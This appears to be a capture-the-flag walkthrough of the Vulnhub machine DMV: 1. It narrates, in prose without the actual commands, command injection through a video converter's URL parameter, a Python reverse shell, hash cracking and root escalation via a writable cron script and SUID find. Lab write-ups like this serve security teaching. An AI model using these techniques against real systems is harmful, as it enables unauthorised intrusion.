DMV: 1 Vulnhub Walkthrough

DMV: 1 Vulnhub Walkthrough | DMV: 1 Vulnhub Writeup

Hello friends! Today we are going to take another boot2root challenge known as DMV: 1 The credit for making this VM machine goes to Jonathan and it is another boot2root challenge in which our goal is to get root account access.

Description

It is a simple machine that replicates a real scenario that I found. The goal is to get two flags, one that is in the secret folder and the other that can only be read by the root user

Network Scanning

Let’s start with scanning the network to find our target.

DMV: 1 Vulnhub Walkthrough | DMV: 1 Vulnhub Writeup

Our next step is to scan our target with nmap aggressive scan .

DMV: 1 Vulnhub Walkthrough | DMV: 1 Vulnhub Writeup

The nmap output shows us that there are 2 ports open 22SSH, 80 HTTP

Enumeration

We find that port 80 is running HTTP, so we open the IP in our browser.

and we see a youtube video to audio converter, for example, I copy random youtube video ID and after a minute our audio is converted successfully

After enumeration and crawling the target website we didn’t find anything usefully

So I started our Burp Suite and capture the request and send the request in repeater and lets see how the request packet looks like

After research google I find a article Exploit Popular Linux File Managers with a Fake MP4 according to the post we can execute Several commands using the parameter Exec=

yt_url will not accept spaces in the string or in the command we replace the space environment variable ${IFS}

and our command is executed and we can see the first line of passwd file

Python TCP Reverse Shell

without wasting our time we create a shell.sh python reverse shell file and start our netcat payload listener and using the ( < ) upload our shell target machine

starting our net-cat payload listener

and again send the request using the parameter

after upload the shell our shell is automatic executed after few second we get python reverse shell target machine

now we can execute id command checking our current user and groups

now we move enumerate the directory and we find our first flag.txt file and another .htaccess files

we copy the hash .htpasswd file and crack the hash using john and we found a password ( jessie ) for user itsmeadim

we try the password another user but we failed to login another user

now we decided to download LinPEAS – Linux Privilege Escalation script in the target system and run it

and we find a bash script process is executed by the root clean.sh

we move the process directory and here we see the bash script clean.sh

this file is connect to delete button of index.php file this script is remove the downloads directory after click the delete button

DMV: 1 Vulnhub Walkthrough | DMV: 1 Vulnhub Writeup

Privilege Escalation

we see the permission and group the script and our current user www-data have full permission

using the echo command we overwrite the file now we are creating a simple bash script changing the normal permission to suid bits of the find command

after 30 seconds we run the ls -ls /usr/bin/find command and we successfully set the suid bits to find command

DMV: 1 Vulnhub Walkthrough | DMV: 1 Vulnhub Writeup

now we can run commands as the root user. now we execute /bin/bash using find command and are successfully able to spawn a shell as the root user.

we go to /root directory and find a file called root.txt this is our last root flag

DMV: 1 Vulnhub Walkthrough | DMV: 1 Vulnhub Writeup
InfoSecwarrior CTF Vulnhub Walkthrough link